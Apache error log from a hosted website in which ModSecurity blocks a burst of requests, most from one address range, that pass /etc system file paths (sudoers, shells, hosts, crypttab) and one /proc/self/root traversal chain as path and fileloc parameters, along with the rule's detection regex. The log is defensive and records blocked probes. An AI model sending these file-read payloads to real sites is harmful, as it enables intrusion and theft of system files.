[Thu Mar 19 13:22:43.876942 2026] [:error] [pid 15826:tid 140411607643904] [client 57.141.18.4:50008] [client 57.141.18.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi0-oXxyEfFpUF8f8f_QAAAVA"]
[Thu Mar 19 13:22:44.104980 2026] [:error] [pid 15826:tid 140411624429312] [client 57.141.18.11:50010] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dbus-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi1OoXxyEfFpUF8f8f_gAAAU4"]
[Thu Mar 19 13:22:44.690496 2026] [:error] [pid 15826:tid 140411708356352] [client 57.141.18.117:50020] [client 57.141.18.117] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/geoip.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi1OoXxyEfFpUF8f8f_wAAAUQ"]
[Thu Mar 19 13:22:44.747437 2026] [:error] [pid 14269:tid 140411557287680] [client 57.141.18.25:50024] [client 57.141.18.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tenable_tag"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi1AbLMZ6AikZjR9VwjgAAABY"]
[Thu Mar 19 13:22:45.364092 2026] [:error] [pid 15826:tid 140411733534464] [client 57.141.18.111:50038] [client 57.141.18.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi1eoXxyEfFpUF8f8gAQAAAUE"]
[Thu Mar 19 13:22:45.462649 2026] [:error] [pid 19093:tid 140411557287680] [client 57.141.18.10:50042] [client 57.141.18.10] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi1V_V7PWP6ixUYl7PxQAAApY"]
[Thu Mar 19 13:22:46.351923 2026] [:error] [pid 27403:tid 140411741927168] [client 57.141.18.30:50054] [client 57.141.18.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/uwsgi.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi1hkFeYa1D6dYQnAERgAAAcA"]
[Thu Mar 19 13:22:46.403008 2026] [:error] [pid 14269:tid 140411708356352] [client 57.141.18.66:50056] [client 57.141.18.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi1gbLMZ6AikZjR9VwkQAAAAQ"]
[Thu Mar 19 13:22:46.513957 2026] [proxy_fcgi:error] [pid 27293:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:47038] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:22:46.814605 2026] [:error] [pid 15826:tid 140411574073088] [client 57.141.18.111:50064] [client 57.141.18.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/shells"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi1uoXxyEfFpUF8f8gAgAAAVQ"]
[Thu Mar 19 13:22:47.091554 2026] [:error] [pid 26799:tid 140411725141760] [client 57.141.18.82:50072] [client 57.141.18.82] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudoers"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi19a6ubjKNq_cu4Zp0wAAA0I"]
[Thu Mar 19 13:22:47.455159 2026] [:error] [pid 15826:tid 140411557287680] [client 57.141.18.5:50086] [client 57.141.18.5] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inittab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi1-oXxyEfFpUF8f8gBAAAAVY"]
[Thu Mar 19 13:22:48.052144 2026] [:error] [pid 31803:tid 140411699963648] [client 57.141.18.82:50096] [client 57.141.18.82] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi2OyqAr6etmhZHNpy8QAAAEU"]
[Thu Mar 19 13:22:48.558961 2026] [:error] [pid 31803:tid 140411716749056] [client 57.141.18.79:50108] [client 57.141.18.79] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crypttab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi2OyqAr6etmhZHNpy8gAAAEM"]
[Thu Mar 19 13:22:48.971810 2026] [:error] [pid 17653:tid 140411599251200] [client 57.141.18.63:50116] [client 57.141.18.63] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwi2Mdf6f5d65gmYZSMVAAAAtE"]
[Thu Mar 19 13:22:49.436900 2026] [:error] [pid 31803:tid 140411658000128] [client 57.141.18.0:50128] [client 57.141.18.0] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.lightbgcolor"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi2eyqAr6etmhZHNpy8wAAAEo"]
[Thu Mar 19 13:22:49.765767 2026] [:error] [pid 27403:tid 140411624429312] [client 57.141.18.47:50138] [client 57.141.18.47] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi2RkFeYa1D6dYQnAESAAAAc4"]
[Thu Mar 19 13:22:49.770566 2026] [:error] [pid 26799:tid 140411691570944] [client 57.141.18.53:50140] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi2da6ubjKNq_cu4Zp1AAAA0Y"]
[Thu Mar 19 13:22:50.362444 2026] [:error] [pid 15826:tid 140411658000128] [client 57.141.18.81:50154] [client 57.141.18.81] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/statetab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi2uoXxyEfFpUF8f8gBwAAAUo"]
[Thu Mar 19 13:22:51.091533 2026] [:error] [pid 27293:tid 140411708356352] [client 57.141.18.53:50168] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf.bkp-21-10-22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi2_-YZRR_7pZ7nDKerAAAA8Q"]
[Thu Mar 19 13:22:51.146061 2026] [:error] [pid 27293:tid 140411599251200] [client 57.141.18.5:50170] [client 57.141.18.5] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc1.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi2_-YZRR_7pZ7nDKerQAAA9E"]
[Thu Mar 19 13:22:51.515634 2026] [:error] [pid 27293:tid 140411540502272] [client 57.141.18.124:50184] [client 57.141.18.124] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf.save"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi2_-YZRR_7pZ7nDKesQAAA9g"]
[Thu Mar 19 13:22:51.832080 2026] [:error] [pid 27293:tid 140411607643904] [client 57.141.18.95:50192] [client 57.141.18.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi2_-YZRR_7pZ7nDKesgAAA9A"]
[Thu Mar 19 13:22:52.014890 2026] [:error] [pid 27293:tid 140411666392832] [client 57.141.18.32:50196] [client 57.141.18.32] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi3P-YZRR_7pZ7nDKeswAAA8k"]
[Thu Mar 19 13:22:52.200730 2026] [:error] [pid 27293:tid 140411733534464] [client 74.7.243.128:54840] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abwi3P-YZRR_7pZ7nDKetAAAA8E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 13:22:52.592187 2026] [:error] [pid 14269:tid 140411548894976] [client 57.141.18.119:50204] [client 57.141.18.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi3AbLMZ6AikZjR9VwkgAAABc"]
[Thu Mar 19 13:22:52.687209 2026] [:error] [pid 31803:tid 140411674785536] [client 57.141.18.2:50210] [client 57.141.18.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sasl2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi3OyqAr6etmhZHNpy9AAAAEg"]
[Thu Mar 19 13:22:53.287344 2026] [:error] [pid 27293:tid 140411616036608] [client 57.141.18.56:50228] [client 57.141.18.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi3f-YZRR_7pZ7nDKeuAAAA88"]
[Thu Mar 19 13:22:53.843528 2026] [:error] [pid 31803:tid 140411632822016] [client 57.141.18.75:50238] [client 57.141.18.75] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/machine-id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/hagmall/besticking013274184619.phtml"] [unique_id "abwi3eyqAr6etmhZHNpy9QAAAE0"]
